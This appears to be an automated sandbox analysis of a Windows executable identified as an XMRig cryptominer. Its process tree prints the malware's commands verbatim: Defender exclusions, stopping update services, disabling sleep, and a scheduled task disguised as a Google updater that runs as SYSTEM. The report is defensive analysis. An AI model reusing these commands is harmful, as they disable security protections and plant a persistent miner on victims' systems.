Overview

overview

10

Static

static

1

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    09-10-2023 12:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    9.8MB

  • MD5

    caa5d4bc40598d0896c79a5ffc90e301

  • SHA1

    7af47a5ca2cc7f422b6bf33620b385fe6899af29

  • SHA256

    b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109

  • SHA512

    95cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1

  • SSDEEP

    196608:plXsEIej17HAGQkOYj6Tr71XILoqW0wRbGypipMtCTC+K:plXsnGQfYCIluRpipMtCTCl

Score
10/10
xmrigevasionminer

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 13 IoCs
    miner
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1184
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:3020
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:2520
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:2700
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:2436
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:2604
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2940
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2404
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2916
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2064
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2388
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lrtxivj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1572
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:528
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1616
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:1788
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:1612
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:1716
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:1872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lrtxivj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:1372
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1708
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1672
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:944
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1416
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:836
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1240
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {ED9F0E92-AE37-45B0-A4B5-39E0DBC88664} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:568
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:788
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2360

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          9.8MB

          MD5

          caa5d4bc40598d0896c79a5ffc90e301

          SHA1

          7af47a5ca2cc7f422b6bf33620b385fe6899af29

          SHA256

          b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109

          SHA512

          95cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1

          Download Submit

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          9.8MB

          MD5

          caa5d4bc40598d0896c79a5ffc90e301

          SHA1

          7af47a5ca2cc7f422b6bf33620b385fe6899af29

          SHA256

          b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109

          SHA512

          95cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          5a61d3d9cbda84e3d7d404a437f495c2

          SHA1

          66fa1bc05d324e6e2964cd2bd4c4d302afff98a2

          SHA256

          3085068905d07f83d0f8ef26b817632c2686bcfb2a089fe1fca20c527cc69a34

          SHA512

          4d37e5719decc31f126e6d1f4896fee83b71ea7f318745af69f5664216a4dff5f9ffac3f17deb1bc92da24cd2444e563c5295cdd436e073366c65ef146e0b9e8

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KRSZMYWOE4D91QODLN4P.temp
          Filesize

          7KB

          MD5

          5a61d3d9cbda84e3d7d404a437f495c2

          SHA1

          66fa1bc05d324e6e2964cd2bd4c4d302afff98a2

          SHA256

          3085068905d07f83d0f8ef26b817632c2686bcfb2a089fe1fca20c527cc69a34

          SHA512

          4d37e5719decc31f126e6d1f4896fee83b71ea7f318745af69f5664216a4dff5f9ffac3f17deb1bc92da24cd2444e563c5295cdd436e073366c65ef146e0b9e8

          Download Submit

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          9.8MB

          MD5

          caa5d4bc40598d0896c79a5ffc90e301

          SHA1

          7af47a5ca2cc7f422b6bf33620b385fe6899af29

          SHA256

          b45152b6f575816c3d86ce8bb35fff917e6535de4ae84c04a4b97970ed0e8109

          SHA512

          95cc5f4bcbd1cb5badc24681e9a4a478e7b484ffe8ad441be86e2fd80a2410cf67e39d5c548227d18babf6c7c0fb58b5e680ea662c039b6f6c09ae11324676a1

          Download Submit

        • memory/788-32-0x000000013F870000-0x000000014023F000-memory.dmp

          Filesize

          9.8MB

          Download

        • memory/788-49-0x000000013F870000-0x000000014023F000-memory.dmp

          Filesize

          9.8MB

          Download

        • memory/836-57-0x0000000140000000-0x000000014002A000-memory.dmp

          Filesize

          168KB

          Download

        • memory/836-52-0x0000000140000000-0x000000014002A000-memory.dmp

          Filesize

          168KB

          Download

        • memory/1240-76-0x00000000001E0000-0x0000000000200000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1240-80-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-75-0x00000000001B0000-0x00000000001D0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1240-64-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-70-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-62-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-60-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-58-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-72-0x00000000001E0000-0x0000000000200000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1240-56-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-54-0x00000000001B0000-0x00000000001D0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1240-74-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-66-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-68-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-78-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-53-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1240-71-0x00000000001B0000-0x00000000001D0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1240-51-0x00000000001B0000-0x00000000001D0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1240-50-0x0000000000040000-0x0000000000060000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1664-40-0x0000000000DB0000-0x0000000000E30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1664-39-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/1664-42-0x0000000000DB0000-0x0000000000E30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1664-41-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/1664-43-0x0000000000DB0000-0x0000000000E30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1664-44-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2500-28-0x000000013F0B0000-0x000000013FA7F000-memory.dmp

          Filesize

          9.8MB

          Download

        • memory/2500-4-0x000000013F0B0000-0x000000013FA7F000-memory.dmp

          Filesize

          9.8MB

          Download

        • memory/2540-21-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2540-20-0x00000000024D0000-0x00000000024D8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2540-19-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2540-18-0x000000001B140000-0x000000001B422000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2540-22-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2540-24-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2540-26-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2540-25-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2540-23-0x0000000002430000-0x00000000024B0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2648-33-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2648-34-0x0000000001180000-0x0000000001200000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2648-37-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2648-35-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2648-36-0x0000000001180000-0x0000000001200000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3008-12-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/3008-11-0x00000000026B0000-0x0000000002730000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3008-9-0x0000000002250000-0x0000000002258000-memory.dmp

          Filesize

          32KB

          Download

        • memory/3008-10-0x00000000026B0000-0x0000000002730000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3008-8-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/3008-7-0x00000000026B0000-0x0000000002730000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3008-6-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/3008-5-0x000000001B080000-0x000000001B362000-memory.dmp

          Filesize

          2.9MB

          Download